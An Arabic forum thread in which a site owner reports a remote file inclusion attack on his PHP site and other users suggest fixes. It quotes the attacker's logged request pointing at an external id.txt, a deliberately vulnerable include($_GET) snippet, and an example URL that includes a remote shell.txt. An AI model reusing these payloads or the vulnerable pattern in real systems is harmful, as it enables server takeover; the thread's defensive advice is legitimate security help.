هنالك هاكرز يهاجمون موقعي ولا اعرف التخلص منهم

[hamudi]

لقد لاحظت بانهم يستخدمون الاكواد :

SERV REQUEST_URI=/index.php//classified_right.php?language_dir=http://usuarios.lycos.es/workink/id.txt????

http://index.php//classified_right.p...ink/id.txt????

ما العمل؟

[فتى الخفجي]

اخوي..ثغرة.انكلود...@!!!خطيرة.الثغره.باماكانه.التحكم.بالس يرفر.كامل.حسب.خبرته
عطل.الدوال..أو..

Include

Include_once

Require

Require_once

مثال..للخطا.بالسكربت
<?php

$vuln = $_GET['rfi'];

include ($vuln);

?>
http://localhost/indexx.php?rfi=www.xx.com/shell.txt?
سكربت..النيوك.مركب.عطل.الدوال.الخطرة.بالسيرفر.
وانشاءالله.تنحل

مجرد..توضيح.فقط

[hamudi]

كيف يمكنني تعطيل الدوال التي ذكرتها من ال cpanel ??
لانه لا يمكنني الوصول للملف php.ini

[young coder]

علي الاقل احذف اي http:// من المتغيرات

[فتى الخفجي]

كيف يمكنني تعطيل الدوال التي ذكرتها من ال cpanel ??
لانه لا يمكنني الوصول للملف php.ini

اذا.انت.على.استضافه.ماتقدررر
اذا.صاحب.السيرفر.تستطيع

[ابوطارق]

اتصل بصاحب السرفر واعمله هذا

[Mostafa Maher]

ليس شرطاً أن تعدل في الـ php.ini لسد هذه الثغرة لمنع تضمين الملفات من خارج السرفر
- افحص قيمة المتغير وتأكد من خلوه لأي كود ضار أو رابط خارجي

حل سريع في الكود المكتوب بالأعلى
- انظر في اللغة الإفتراضية التي تعتمد عليها واستخرج المسار الخاص بها
- خذ المسار وضعه داخل دالة الـ include الخاصة بتضمين ملفات اللغة.
- بهذا تكون قضيت على تعدد اللغات في موقعك واستخدمت واحدة فقط ..
وهذا حل مؤقت إن لم تأخذ بأحد الحلول السابقة.

لا تنسى أيضاً حظر IP المخترق .